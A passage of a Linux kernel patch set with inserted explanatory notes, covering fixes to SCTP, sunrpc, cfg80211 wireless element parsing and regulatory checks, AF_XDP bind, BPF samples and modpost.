+ 	.setsockopt	= sctp_setsockopt,
+ 	.getsockopt	= sctp_getsockopt,
++	.bpf_bypass_getsockopt	= sctp_bpf_bypass_getsockopt,
+ 	.sendmsg	= sctp_sendmsg,
+ 	.recvmsg	= sctp_recvmsg,
+ 	.bind		= sctp_bind,
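[Note: sctp_bpf_bypass_getsockopt() opts three optnames out of the BPF cgroup getsockopt hook: the peeloff and connectx3 results carry a kernel-installed file descriptor in the option buffer, so letting a BPF program rewrite or re-copy that buffer would corrupt it. A generic sketch of such a bypass predicate, with hypothetical SOL_EXAMPLE/EXAMPLE_OPT_INSTALLS_FD names:

	/* Return true for optnames whose optval is kernel-owned state
	 * (here: a freshly installed fd) that BPF must not touch. */
	static bool proto_bpf_bypass_getsockopt(int level, int optname)
	{
		return level == SOL_EXAMPLE &&
		       optname == EXAMPLE_OPT_INSTALLS_FD;
	}
]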
+diff --git a/net/sunrpc/svcsock.c b/net/sunrpc/svcsock.c
+index d808c00cdbac1..23b4c728de598 100644
+--- a/net/sunrpc/svcsock.c
++++ b/net/sunrpc/svcsock.c
+@@ -688,12 +688,6 @@ static void svc_tcp_listen_data_ready(struct sock *sk)
+ {
+ 	struct svc_sock	*svsk = (struct svc_sock *)sk->sk_user_data;
+ 
+-	if (svsk) {
+-		/* Refer to svc_setup_socket() for details. */
+-		rmb();
+-		svsk->sk_odata(sk);
+-	}
+-
+ 	/*
+ 	 * This callback may called twice when a new connection
+ 	 * is established as a child socket inherits everything
+@@ -702,13 +696,18 @@ static void svc_tcp_listen_data_ready(struct sock *sk)
+ 	 *    when one of child sockets become ESTABLISHED.
+ 	 * 2) data_ready method of the child socket may be called
+ 	 *    when it receives data before the socket is accepted.
+-	 * In case of 2, we should ignore it silently.
++	 * In case of 2, we should ignore it silently and DO NOT
++	 * dereference svsk.
+ 	 */
+-	if (sk->sk_state == TCP_LISTEN) {
+-		if (svsk) {
+-			set_bit(XPT_CONN, &svsk->sk_xprt.xpt_flags);
+-			svc_xprt_enqueue(&svsk->sk_xprt);
+-		}
++	if (sk->sk_state != TCP_LISTEN)
++		return;
++
++	if (svsk) {
++		/* Refer to svc_setup_socket() for details. */
++		rmb();
++		svsk->sk_odata(sk);
++		set_bit(XPT_CONN, &svsk->sk_xprt.xpt_flags);
++		svc_xprt_enqueue(&svsk->sk_xprt);
+ 	}
+ }
+ 
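[Note: the listener callback is reordered so nothing dereferences sk_user_data until sk_state has been checked — a child socket inherits the parent's data_ready and can fire before svc_setup_socket() has published svsk; the rmb() pairs with the write side there. The publish/consume shape in miniature, with illustrative types (not the sunrpc ones):

	#include <asm/barrier.h>

	enum { LISTENING = 1 };

	struct conn {
		int state;		/* e.g. LISTENING */
		void *user_data;	/* set last by setup, after smp_wmb() */
	};

	static void handle(void *p);

	static void data_ready_cb(struct conn *c)
	{
		if (c->state != LISTENING)	/* child socket: bail, no deref */
			return;

		if (c->user_data) {
			smp_rmb();		/* pairs with setup-side smp_wmb() */
			handle(c->user_data);
		}
	}
]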
+diff --git a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+index 53a7cb2f6c07d..6da6608985ce9 100644
+--- a/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
++++ b/net/sunrpc/xprtrdma/svc_rdma_recvfrom.c
+@@ -796,6 +796,12 @@ int svc_rdma_recvfrom(struct svc_rqst *rqstp)
+ 	struct svc_rdma_recv_ctxt *ctxt;
+ 	int ret;
+ 
++	/* Prevent svc_xprt_release() from releasing pages in rq_pages
++	 * when returning 0 or an error.
++	 */
++	rqstp->rq_respages = rqstp->rq_pages;
++	rqstp->rq_next_page = rqstp->rq_respages;
++
+ 	rqstp->rq_xprt_ctxt = NULL;
+ 
+ 	ctxt = NULL;
+@@ -819,12 +825,6 @@ int svc_rdma_recvfrom(struct svc_rqst *rqstp)
+ 				   DMA_FROM_DEVICE);
+ 	svc_rdma_build_arg_xdr(rqstp, ctxt);
+ 
+-	/* Prevent svc_xprt_release from releasing pages in rq_pages
+-	 * if we return 0 or an error.
+-	 */
+-	rqstp->rq_respages = rqstp->rq_pages;
+-	rqstp->rq_next_page = rqstp->rq_respages;
+-
+ 	ret = svc_rdma_xdr_decode_req(&rqstp->rq_arg, ctxt);
+ 	if (ret < 0)
+ 		goto out_err;
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index b3ec9eaec36b3..609b79fe4a748 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -721,22 +721,6 @@ int wiphy_register(struct wiphy *wiphy)
+ 			return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * if a wiphy has unsupported modes for regulatory channel enforcement,
+-	 * opt-out of enforcement checking
+-	 */
+-	if (wiphy->interface_modes & ~(BIT(NL80211_IFTYPE_STATION) |
+-				       BIT(NL80211_IFTYPE_P2P_CLIENT) |
+-				       BIT(NL80211_IFTYPE_AP) |
+-				       BIT(NL80211_IFTYPE_MESH_POINT) |
+-				       BIT(NL80211_IFTYPE_P2P_GO) |
+-				       BIT(NL80211_IFTYPE_ADHOC) |
+-				       BIT(NL80211_IFTYPE_P2P_DEVICE) |
+-				       BIT(NL80211_IFTYPE_NAN) |
+-				       BIT(NL80211_IFTYPE_AP_VLAN) |
+-				       BIT(NL80211_IFTYPE_MONITOR)))
+-		wiphy->regulatory_flags |= REGULATORY_IGNORE_STALE_KICKOFF;
+-
+ 	if (WARN_ON((wiphy->regulatory_flags & REGULATORY_WIPHY_SELF_MANAGED) &&
+ 		    (wiphy->regulatory_flags &
+ 					(REGULATORY_CUSTOM_REG |
+diff --git a/net/wireless/reg.c b/net/wireless/reg.c
+index 522180919a1a3..5da1a641ef178 100644
+--- a/net/wireless/reg.c
++++ b/net/wireless/reg.c
+@@ -2390,7 +2390,7 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 
+ 		if (!wdev->valid_links && link > 0)
+ 			break;
+-		if (!(wdev->valid_links & BIT(link)))
++		if (wdev->valid_links && !(wdev->valid_links & BIT(link)))
+ 			continue;
+ 		switch (iftype) {
+ 		case NL80211_IFTYPE_AP:
+@@ -2429,9 +2429,17 @@ static bool reg_wdev_chan_valid(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 		case NL80211_IFTYPE_P2P_DEVICE:
+ 			/* no enforcement required */
+ 			break;
++		case NL80211_IFTYPE_OCB:
++			if (!wdev->u.ocb.chandef.chan)
++				continue;
++			chandef = wdev->u.ocb.chandef;
++			break;
++		case NL80211_IFTYPE_NAN:
++			/* we have no info, but NAN is also pretty universal */
++			continue;
+ 		default:
+ 			/* others not implemented for now */
+-			WARN_ON(1);
++			WARN_ON_ONCE(1);
+ 			break;
+ 		}
+ 
+@@ -2490,9 +2498,7 @@ static void reg_check_chans_work(struct work_struct *work)
+ 	rtnl_lock();
+ 
+ 	list_for_each_entry(rdev, &cfg80211_rdev_list, list)
+-		if (!(rdev->wiphy.regulatory_flags &
+-		      REGULATORY_IGNORE_STALE_KICKOFF))
+-			reg_leave_invalid_chans(&rdev->wiphy);
++		reg_leave_invalid_chans(&rdev->wiphy);
+ 
+ 	rtnl_unlock();
+ }
+diff --git a/net/wireless/scan.c b/net/wireless/scan.c
+index 6c2b73c0d36e8..efe9283e98935 100644
+--- a/net/wireless/scan.c
++++ b/net/wireless/scan.c
+@@ -262,117 +262,152 @@ bool cfg80211_is_element_inherited(const struct element *elem,
+ }
+ EXPORT_SYMBOL(cfg80211_is_element_inherited);
+ 
+-static size_t cfg80211_gen_new_ie(const u8 *ie, size_t ielen,
+-				  const u8 *subelement, size_t subie_len,
+-				  u8 *new_ie, gfp_t gfp)
++static size_t cfg80211_copy_elem_with_frags(const struct element *elem,
++					    const u8 *ie, size_t ie_len,
++					    u8 **pos, u8 *buf, size_t buf_len)
+ {
+-	u8 *pos, *tmp;
+-	const u8 *tmp_old, *tmp_new;
+-	const struct element *non_inherit_elem;
+-	u8 *sub_copy;
++	if (WARN_ON((u8 *)elem < ie || elem->data > ie + ie_len ||
++		    elem->data + elem->datalen > ie + ie_len))
++		return 0;
+ 
+-	/* copy subelement as we need to change its content to
+-	 * mark an ie after it is processed.
+-	 */
+-	sub_copy = kmemdup(subelement, subie_len, gfp);
+-	if (!sub_copy)
++	if (elem->datalen + 2 > buf + buf_len - *pos)
+ 		return 0;
+ 
+-	pos = &new_ie[0];
++	memcpy(*pos, elem, elem->datalen + 2);
++	*pos += elem->datalen + 2;
++
++	/* Finish if it is not fragmented  */
++	if (elem->datalen != 255)
++		return *pos - buf;
++
++	ie_len = ie + ie_len - elem->data - elem->datalen;
++	ie = (const u8 *)elem->data + elem->datalen;
++
++	for_each_element(elem, ie, ie_len) {
++		if (elem->id != WLAN_EID_FRAGMENT)
++			break;
++
++		if (elem->datalen + 2 > buf + buf_len - *pos)
++			return 0;
++
++		memcpy(*pos, elem, elem->datalen + 2);
++		*pos += elem->datalen + 2;
+ 
+-	/* set new ssid */
+-	tmp_new = cfg80211_find_ie(WLAN_EID_SSID, sub_copy, subie_len);
+-	if (tmp_new) {
+-		memcpy(pos, tmp_new, tmp_new[1] + 2);
+-		pos += (tmp_new[1] + 2);
++		if (elem->datalen != 255)
++			break;
+ 	}
+ 
+-	/* get non inheritance list if exists */
+-	non_inherit_elem =
+-		cfg80211_find_ext_elem(WLAN_EID_EXT_NON_INHERITANCE,
+-				       sub_copy, subie_len);
++	return *pos - buf;
++}
+ 
+-	/* go through IEs in ie (skip SSID) and subelement,
+-	 * merge them into new_ie
++static size_t cfg80211_gen_new_ie(const u8 *ie, size_t ielen,
++				  const u8 *subie, size_t subie_len,
++				  u8 *new_ie, size_t new_ie_len)
++{
++	const struct element *non_inherit_elem, *parent, *sub;
++	u8 *pos = new_ie;
++	u8 id, ext_id;
++	unsigned int match_len;
++
++	non_inherit_elem = cfg80211_find_ext_elem(WLAN_EID_EXT_NON_INHERITANCE,
++						  subie, subie_len);
++
++	/* We copy the elements one by one from the parent to the generated
++	 * elements.
++	 * If they are not inherited (included in subie or in the non
++	 * inheritance element), then we copy all occurrences the first time
++	 * we see this element type.
+ 	 */
+-	tmp_old = cfg80211_find_ie(WLAN_EID_SSID, ie, ielen);
+-	tmp_old = (tmp_old) ? tmp_old + tmp_old[1] + 2 : ie;
+-
+-	while (tmp_old + 2 - ie <= ielen &&
+-	       tmp_old + tmp_old[1] + 2 - ie <= ielen) {
+-		if (tmp_old[0] == 0) {
+-			tmp_old++;
++	for_each_element(parent, ie, ielen) {
++		if (parent->id == WLAN_EID_FRAGMENT)
+ 			continue;
++
++		if (parent->id == WLAN_EID_EXTENSION) {
++			if (parent->datalen < 1)
++				continue;
++
++			id = WLAN_EID_EXTENSION;
++			ext_id = parent->data[0];
++			match_len = 1;
++		} else {
++			id = parent->id;
++			match_len = 0;
+ 		}
+ 
+-		if (tmp_old[0] == WLAN_EID_EXTENSION)
+-			tmp = (u8 *)cfg80211_find_ext_ie(tmp_old[2], sub_copy,
+-							 subie_len);
+-		else
+-			tmp = (u8 *)cfg80211_find_ie(tmp_old[0], sub_copy,
+-						     subie_len);
++		/* Find first occurrence in subie */
++		sub = cfg80211_find_elem_match(id, subie, subie_len,
++					       &ext_id, match_len, 0);
+ 
+-		if (!tmp) {
+-			const struct element *old_elem = (void *)tmp_old;
++		/* Copy from parent if not in subie and inherited */
++		if (!sub &&
++		    cfg80211_is_element_inherited(parent, non_inherit_elem)) {
++			if (!cfg80211_copy_elem_with_frags(parent,
++							   ie, ielen,
++							   &pos, new_ie,
++							   new_ie_len))
++				return 0;
+ 
+-			/* ie in old ie but not in subelement */
+-			if (cfg80211_is_element_inherited(old_elem,
+-							  non_inherit_elem)) {
+-				memcpy(pos, tmp_old, tmp_old[1] + 2);
+-				pos += tmp_old[1] + 2;
+-			}
+-		} else {
+-			/* ie in transmitting ie also in subelement,
+-			 * copy from subelement and flag the ie in subelement
+-			 * as copied (by setting eid field to WLAN_EID_SSID,
+-			 * which is skipped anyway).
+-			 * For vendor ie, compare OUI + type + subType to
+-			 * determine if they are the same ie.
+-			 */
+-			if (tmp_old[0] == WLAN_EID_VENDOR_SPECIFIC) {
+-				if (tmp_old[1] >= 5 && tmp[1] >= 5 &&
+-				    !memcmp(tmp_old + 2, tmp + 2, 5)) {
+-					/* same vendor ie, copy from
+-					 * subelement
+-					 */
+-					memcpy(pos, tmp, tmp[1] + 2);
+-					pos += tmp[1] + 2;
+-					tmp[0] = WLAN_EID_SSID;
+-				} else {
+-					memcpy(pos, tmp_old, tmp_old[1] + 2);
+-					pos += tmp_old[1] + 2;
+-				}
+-			} else {
+-				/* copy ie from subelement into new ie */
+-				memcpy(pos, tmp, tmp[1] + 2);
+-				pos += tmp[1] + 2;
+-				tmp[0] = WLAN_EID_SSID;
+-			}
++			continue;
+ 		}
+ 
+-		if (tmp_old + tmp_old[1] + 2 - ie == ielen)
+-			break;
++		/* Already copied if an earlier element had the same type */
++		if (cfg80211_find_elem_match(id, ie, (u8 *)parent - ie,
++					     &ext_id, match_len, 0))
++			continue;
+ 
+-		tmp_old += tmp_old[1] + 2;
++		/* Not inheriting, copy all similar elements from subie */
++		while (sub) {
++			if (!cfg80211_copy_elem_with_frags(sub,
++							   subie, subie_len,
++							   &pos, new_ie,
++							   new_ie_len))
++				return 0;
++
++			sub = cfg80211_find_elem_match(id,
++						       sub->data + sub->datalen,
++						       subie_len + subie -
++						       (sub->data +
++							sub->datalen),
++						       &ext_id, match_len, 0);
++		}
+ 	}
+ 
+-	/* go through subelement again to check if there is any ie not
+-	 * copied to new ie, skip ssid, capability, bssid-index ie
++	/* The above misses elements that are included in subie but not in the
++	 * parent, so do a pass over subie and append those.
++	 * Skip the non-tx BSSID caps and non-inheritance element.
+ 	 */
+-	tmp_new = sub_copy;
+-	while (tmp_new + 2 - sub_copy <= subie_len &&
+-	       tmp_new + tmp_new[1] + 2 - sub_copy <= subie_len) {
+-		if (!(tmp_new[0] == WLAN_EID_NON_TX_BSSID_CAP ||
+-		      tmp_new[0] == WLAN_EID_SSID)) {
+-			memcpy(pos, tmp_new, tmp_new[1] + 2);
+-			pos += tmp_new[1] + 2;
++	for_each_element(sub, subie, subie_len) {
++		if (sub->id == WLAN_EID_NON_TX_BSSID_CAP)
++			continue;
++
++		if (sub->id == WLAN_EID_FRAGMENT)
++			continue;
++
++		if (sub->id == WLAN_EID_EXTENSION) {
++			if (sub->datalen < 1)
++				continue;
++
++			id = WLAN_EID_EXTENSION;
++			ext_id = sub->data[0];
++			match_len = 1;
++
++			if (ext_id == WLAN_EID_EXT_NON_INHERITANCE)
++				continue;
++		} else {
++			id = sub->id;
++			match_len = 0;
+ 		}
+-		if (tmp_new + tmp_new[1] + 2 - sub_copy == subie_len)
+-			break;
+-		tmp_new += tmp_new[1] + 2;
++
++		/* Processed if one was included in the parent */
++		if (cfg80211_find_elem_match(id, ie, ielen,
++					     &ext_id, match_len, 0))
++			continue;
++
++		if (!cfg80211_copy_elem_with_frags(sub, subie, subie_len,
++						   &pos, new_ie, new_ie_len))
++			return 0;
+ 	}
+ 
+-	kfree(sub_copy);
+ 	return pos - new_ie;
+ }
+ 
+@@ -2224,7 +2259,7 @@ static void cfg80211_parse_mbssid_data(struct wiphy *wiphy,
+ 			new_ie_len = cfg80211_gen_new_ie(ie, ielen,
+ 							 profile,
+ 							 profile_len, new_ie,
+-							 gfp);
++							 IEEE80211_MAX_DATA_LEN);
+ 			if (!new_ie_len)
+ 				continue;
+ 
+@@ -2273,118 +2308,6 @@ cfg80211_inform_bss_data(struct wiphy *wiphy,
+ }
+ EXPORT_SYMBOL(cfg80211_inform_bss_data);
+ 
+-static void
+-cfg80211_parse_mbssid_frame_data(struct wiphy *wiphy,
+-				 struct cfg80211_inform_bss *data,
+-				 struct ieee80211_mgmt *mgmt, size_t len,
+-				 struct cfg80211_non_tx_bss *non_tx_data,
+-				 gfp_t gfp)
+-{
+-	enum cfg80211_bss_frame_type ftype;
+-	const u8 *ie = mgmt->u.probe_resp.variable;
+-	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+-				      u.probe_resp.variable);
+-
+-	ftype = ieee80211_is_beacon(mgmt->frame_control) ?
+-		CFG80211_BSS_FTYPE_BEACON : CFG80211_BSS_FTYPE_PRESP;
+-
+-	cfg80211_parse_mbssid_data(wiphy, data, ftype, mgmt->bssid,
+-				   le64_to_cpu(mgmt->u.probe_resp.timestamp),
+-				   le16_to_cpu(mgmt->u.probe_resp.beacon_int),
+-				   ie, ielen, non_tx_data, gfp);
+-}
+-
+-static void
+-cfg80211_update_notlisted_nontrans(struct wiphy *wiphy,
+-				   struct cfg80211_bss *nontrans_bss,
+-				   struct ieee80211_mgmt *mgmt, size_t len)
+-{
+-	u8 *ie, *new_ie, *pos;
+-	const struct element *nontrans_ssid;
+-	const u8 *trans_ssid, *mbssid;
+-	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+-				      u.probe_resp.variable);
+-	size_t new_ie_len;
+-	struct cfg80211_bss_ies *new_ies;
+-	const struct cfg80211_bss_ies *old;
+-	size_t cpy_len;
+-
+-	lockdep_assert_held(&wiphy_to_rdev(wiphy)->bss_lock);
+-
+-	ie = mgmt->u.probe_resp.variable;
+-
+-	new_ie_len = ielen;
+-	trans_ssid = cfg80211_find_ie(WLAN_EID_SSID, ie, ielen);
+-	if (!trans_ssid)
+-		return;
+-	new_ie_len -= trans_ssid[1];
+-	mbssid = cfg80211_find_ie(WLAN_EID_MULTIPLE_BSSID, ie, ielen);
+-	/*
+-	 * It's not valid to have the MBSSID element before SSID
+-	 * ignore if that happens - the code below assumes it is
+-	 * after (while copying things inbetween).
+-	 */
+-	if (!mbssid || mbssid < trans_ssid)
+-		return;
+-	new_ie_len -= mbssid[1];
+-
+-	nontrans_ssid = ieee80211_bss_get_elem(nontrans_bss, WLAN_EID_SSID);
+-	if (!nontrans_ssid)
+-		return;
+-
+-	new_ie_len += nontrans_ssid->datalen;
+-
+-	/* generate new ie for nontrans BSS
+-	 * 1. replace SSID with nontrans BSS' SSID
+-	 * 2. skip MBSSID IE
+-	 */
+-	new_ie = kzalloc(new_ie_len, GFP_ATOMIC);
+-	if (!new_ie)
+-		return;
+-
+-	new_ies = kzalloc(sizeof(*new_ies) + new_ie_len, GFP_ATOMIC);
+-	if (!new_ies)
+-		goto out_free;
+-
+-	pos = new_ie;
+-
+-	/* copy the nontransmitted SSID */
+-	cpy_len = nontrans_ssid->datalen + 2;
+-	memcpy(pos, nontrans_ssid, cpy_len);
+-	pos += cpy_len;
+-	/* copy the IEs between SSID and MBSSID */
+-	cpy_len = trans_ssid[1] + 2;
+-	memcpy(pos, (trans_ssid + cpy_len), (mbssid - (trans_ssid + cpy_len)));
+-	pos += (mbssid - (trans_ssid + cpy_len));
+-	/* copy the IEs after MBSSID */
+-	cpy_len = mbssid[1] + 2;
+-	memcpy(pos, mbssid + cpy_len, ((ie + ielen) - (mbssid + cpy_len)));
+-
+-	/* update ie */
+-	new_ies->len = new_ie_len;
+-	new_ies->tsf = le64_to_cpu(mgmt->u.probe_resp.timestamp);
+-	new_ies->from_beacon = ieee80211_is_beacon(mgmt->frame_control);
+-	memcpy(new_ies->data, new_ie, new_ie_len);
+-	if (ieee80211_is_probe_resp(mgmt->frame_control)) {
+-		old = rcu_access_pointer(nontrans_bss->proberesp_ies);
+-		rcu_assign_pointer(nontrans_bss->proberesp_ies, new_ies);
+-		rcu_assign_pointer(nontrans_bss->ies, new_ies);
+-		if (old)
+-			kfree_rcu((struct cfg80211_bss_ies *)old, rcu_head);
+-	} else {
+-		old = rcu_access_pointer(nontrans_bss->beacon_ies);
+-		rcu_assign_pointer(nontrans_bss->beacon_ies, new_ies);
+-		cfg80211_update_hidden_bsses(bss_from_pub(nontrans_bss),
+-					     new_ies, old);
+-		rcu_assign_pointer(nontrans_bss->ies, new_ies);
+-		if (old)
+-			kfree_rcu((struct cfg80211_bss_ies *)old, rcu_head);
+-	}
+-
+-out_free:
+-	kfree(new_ie);
+-}
+-
+ /* cfg80211_inform_bss_width_frame helper */
+ static struct cfg80211_bss *
+ cfg80211_inform_single_bss_frame_data(struct wiphy *wiphy,
+@@ -2526,51 +2449,31 @@ cfg80211_inform_bss_frame_data(struct wiphy *wiphy,
+ 			       struct ieee80211_mgmt *mgmt, size_t len,
+ 			       gfp_t gfp)
+ {
+-	struct cfg80211_bss *res, *tmp_bss;
++	struct cfg80211_bss *res;
+ 	const u8 *ie = mgmt->u.probe_resp.variable;
+-	const struct cfg80211_bss_ies *ies1, *ies2;
+ 	size_t ielen = len - offsetof(struct ieee80211_mgmt,
+ 				      u.probe_resp.variable);
++	enum cfg80211_bss_frame_type ftype;
+ 	struct cfg80211_non_tx_bss non_tx_data = {};
+ 
+ 	res = cfg80211_inform_single_bss_frame_data(wiphy, data, mgmt,
+ 						    len, gfp);
++	if (!res)
++		return NULL;
+ 
+ 	/* don't do any further MBSSID handling for S1G */
+ 	if (ieee80211_is_s1g_beacon(mgmt->frame_control))
+ 		return res;
+ 
+-	if (!res || !wiphy->support_mbssid ||
+-	    !cfg80211_find_elem(WLAN_EID_MULTIPLE_BSSID, ie, ielen))
+-		return res;
+-	if (wiphy->support_only_he_mbssid &&
+-	    !cfg80211_find_ext_elem(WLAN_EID_EXT_HE_CAPABILITY, ie, ielen))
+-		return res;
+-
++	ftype = ieee80211_is_beacon(mgmt->frame_control) ?
++		CFG80211_BSS_FTYPE_BEACON : CFG80211_BSS_FTYPE_PRESP;
+ 	non_tx_data.tx_bss = res;
+-	/* process each non-transmitting bss */
+-	cfg80211_parse_mbssid_frame_data(wiphy, data, mgmt, len,
+-					 &non_tx_data, gfp);
+-
+-	spin_lock_bh(&wiphy_to_rdev(wiphy)->bss_lock);
+ 
+-	/* check if the res has other nontransmitting bss which is not
+-	 * in MBSSID IE
+-	 */
+-	ies1 = rcu_access_pointer(res->ies);
+-
+-	/* go through nontrans_list, if the timestamp of the BSS is
+-	 * earlier than the timestamp of the transmitting BSS then
+-	 * update it
+-	 */
+-	list_for_each_entry(tmp_bss, &res->nontrans_list,
+-			    nontrans_list) {
+-		ies2 = rcu_access_pointer(tmp_bss->ies);
+-		if (ies2->tsf < ies1->tsf)
+-			cfg80211_update_notlisted_nontrans(wiphy, tmp_bss,
+-							   mgmt, len);
+-	}
+-	spin_unlock_bh(&wiphy_to_rdev(wiphy)->bss_lock);
++	/* process each non-transmitting bss */
++	cfg80211_parse_mbssid_data(wiphy, data, ftype, mgmt->bssid,
++				   le64_to_cpu(mgmt->u.probe_resp.timestamp),
++				   le16_to_cpu(mgmt->u.probe_resp.beacon_int),
++				   ie, ielen, &non_tx_data, gfp);
+ 
+ 	return res;
+ }
+diff --git a/net/xdp/xsk.c b/net/xdp/xsk.c
+index 13f62d2402e71..371d269d22fa0 100644
+--- a/net/xdp/xsk.c
++++ b/net/xdp/xsk.c
+@@ -886,6 +886,7 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 	struct sock *sk = sock->sk;
+ 	struct xdp_sock *xs = xdp_sk(sk);
+ 	struct net_device *dev;
++	int bound_dev_if;
+ 	u32 flags, qid;
+ 	int err = 0;
+ 
+@@ -899,6 +900,10 @@ static int xsk_bind(struct socket *sock, struct sockaddr *addr, int addr_len)
+ 		      XDP_USE_NEED_WAKEUP))
+ 		return -EINVAL;
+ 
++	bound_dev_if = READ_ONCE(sk->sk_bound_dev_if);
++	if (bound_dev_if && bound_dev_if != sxdp->sxdp_ifindex)
++		return -EINVAL;
++
+ 	rtnl_lock();
+ 	mutex_lock(&xs->mutex);
+ 	if (xs->state != XSK_READY) {
+diff --git a/samples/bpf/tcp_basertt_kern.c b/samples/bpf/tcp_basertt_kern.c
+index 8dfe09a92feca..822b0742b8154 100644
+--- a/samples/bpf/tcp_basertt_kern.c
++++ b/samples/bpf/tcp_basertt_kern.c
+@@ -47,7 +47,7 @@ int bpf_basertt(struct bpf_sock_ops *skops)
+ 		case BPF_SOCK_OPS_BASE_RTT:
+ 			n = bpf_getsockopt(skops, SOL_TCP, TCP_CONGESTION,
+ 					   cong, sizeof(cong));
+-			if (!n && !__builtin_memcmp(cong, nv, sizeof(nv)+1)) {
++			if (!n && !__builtin_memcmp(cong, nv, sizeof(nv))) {
+ 				/* Set base_rtt to 80us */
+ 				rv = 80;
+ 			} else if (n) {
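[Note: the one-byte fix above matters — assuming nv is declared along the lines of char nv[] = "nv" as in this sample, sizeof(nv) is 3 and already includes the NUL, so the old sizeof(nv)+1 compared 4 bytes and read one past the constant. Userspace illustration:

	#include <stdio.h>
	#include <string.h>

	int main(void)
	{
		char cong[20] = "nv";
		const char nv[] = "nv";	/* sizeof(nv) == 3, NUL included */

		/* sizeof(nv) + 1 would compare a 4th byte beyond nv[] */
		if (!memcmp(cong, nv, sizeof(nv)))
			puts("congestion control is nv");
		return 0;
	}
]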
+diff --git a/samples/bpf/xdp1_kern.c b/samples/bpf/xdp1_kern.c
+index 0a5c704badd00..d91f27cbcfa99 100644
+--- a/samples/bpf/xdp1_kern.c
++++ b/samples/bpf/xdp1_kern.c
+@@ -39,7 +39,7 @@ static int parse_ipv6(void *data, u64 nh_off, void *data_end)
+ 	return ip6h->nexthdr;
+ }
+ 
+-#define XDPBUFSIZE	64
++#define XDPBUFSIZE	60
+ SEC("xdp.frags")
+ int xdp_prog1(struct xdp_md *ctx)
+ {
+diff --git a/samples/bpf/xdp2_kern.c b/samples/bpf/xdp2_kern.c
+index 67804ecf7ce37..8bca674451ed1 100644
+--- a/samples/bpf/xdp2_kern.c
++++ b/samples/bpf/xdp2_kern.c
+@@ -55,7 +55,7 @@ static int parse_ipv6(void *data, u64 nh_off, void *data_end)
+ 	return ip6h->nexthdr;
+ }
+ 
+-#define XDPBUFSIZE	64
++#define XDPBUFSIZE	60
+ SEC("xdp.frags")
+ int xdp_prog1(struct xdp_md *ctx)
+ {
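[Note: both samples shrink the on-stack copy buffer from 64 to 60 bytes. bpf_xdp_load_bytes() fails outright when asked for more bytes than the frame contains, and the shortest Ethernet frame an XDP program sees is 60 bytes (the 64-byte wire minimum less the 4-byte FCS), so a 64-byte pull could spuriously drop minimum-size packets while 60 always succeeds. The call shape, as a sketch:

	#include <linux/bpf.h>
	#include <bpf/bpf_helpers.h>

	#define XDPBUFSIZE 60	/* min Ethernet frame without FCS */

	SEC("xdp.frags")
	int xdp_buf_demo(struct xdp_md *ctx)
	{
		__u8 pkt[XDPBUFSIZE] = {};

		/* Returns <0 if the frame is shorter than sizeof(pkt). */
		if (bpf_xdp_load_bytes(ctx, 0, pkt, sizeof(pkt)))
			return XDP_DROP;

		return XDP_PASS;
	}

	char _license[] SEC("license") = "GPL";
]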
+diff --git a/scripts/Makefile.modfinal b/scripts/Makefile.modfinal
+index 25bedd83644b0..3af5e5807983a 100644
+--- a/scripts/Makefile.modfinal
++++ b/scripts/Makefile.modfinal
+@@ -23,7 +23,7 @@ modname = $(notdir $(@:.mod.o=))
+ part-of-module = y
+ 
+ quiet_cmd_cc_o_c = CC [M]  $@
+-      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI), $(c_flags)) -c -o $@ $<
++      cmd_cc_o_c = $(CC) $(filter-out $(CC_FLAGS_CFI) $(CFLAGS_GCOV), $(c_flags)) -c -o $@ $<
+ 
+ %.mod.o: %.mod.c FORCE
+ 	$(call if_changed_dep,cc_o_c)
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index 1dfa80c6b471e..e6be7fc2625fd 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -1157,6 +1157,10 @@ static Elf_Sym *find_elf_symbol(struct elf_info *elf, Elf64_Sword addr,
+ 	if (relsym->st_name != 0)
+ 		return relsym;
+ 
++	/*
++	 * Strive to find a better symbol name, but the resulting name may not
++	 * match the symbol referenced in the original code.
++	 */
+ 	relsym_secindex = get_secindex(elf, relsym);
+ 	for (sym = elf->symtab_start; sym < elf->symtab_stop; sym++) {
+ 		if (get_secindex(elf, sym) != relsym_secindex)
+@@ -1293,49 +1297,12 @@ static void default_mismatch_handler(const char *modname, struct elf_info *elf,
+ 
+ static int is_executable_section(struct elf_info* elf, unsigned int section_index)
+ {
+-	if (section_index > elf->num_sections)
++	if (section_index >= elf->num_sections)
+ 		fatal("section_index is outside elf->num_sections!\n");
+ 
+ 	return ((elf->sechdrs[section_index].sh_flags & SHF_EXECINSTR) == SHF_EXECINSTR);
+ }
+ 
+-/*
+- * We rely on a gross hack in section_rel[a]() calling find_extable_entry_size()
+- * to know the sizeof(struct exception_table_entry) for the target architecture.
+- */
+-static unsigned int extable_entry_size = 0;
+-static void find_extable_entry_size(const char* const sec, const Elf_Rela* r)
+-{
+-	/*
+-	 * If we're currently checking the second relocation within __ex_table,
+-	 * that relocation offset tells us the offsetof(struct
+-	 * exception_table_entry, fixup) which is equal to sizeof(struct
+-	 * exception_table_entry) divided by two.  We use that to our advantage
+-	 * since there's no portable way to get that size as every architecture
+-	 * seems to go with different sized types.  Not pretty but better than
+-	 * hard-coding the size for every architecture..
+-	 */
+-	if (!extable_entry_size)
+-		extable_entry_size = r->r_offset * 2;
+-}
+-
+-static inline bool is_extable_fault_address(Elf_Rela *r)
+-{
+-	/*
+-	 * extable_entry_size is only discovered after we've handled the
+-	 * _second_ relocation in __ex_table, so only abort when we're not
+-	 * handling the first reloc and extable_entry_size is zero.
+-	 */
+-	if (r->r_offset && extable_entry_size == 0)
+-		fatal("extable_entry size hasn't been discovered!\n");
+-
+-	return ((r->r_offset == 0) ||
+-		(r->r_offset % extable_entry_size == 0));
+-}
+-
+-#define is_second_extable_reloc(Start, Cur, Sec)			\
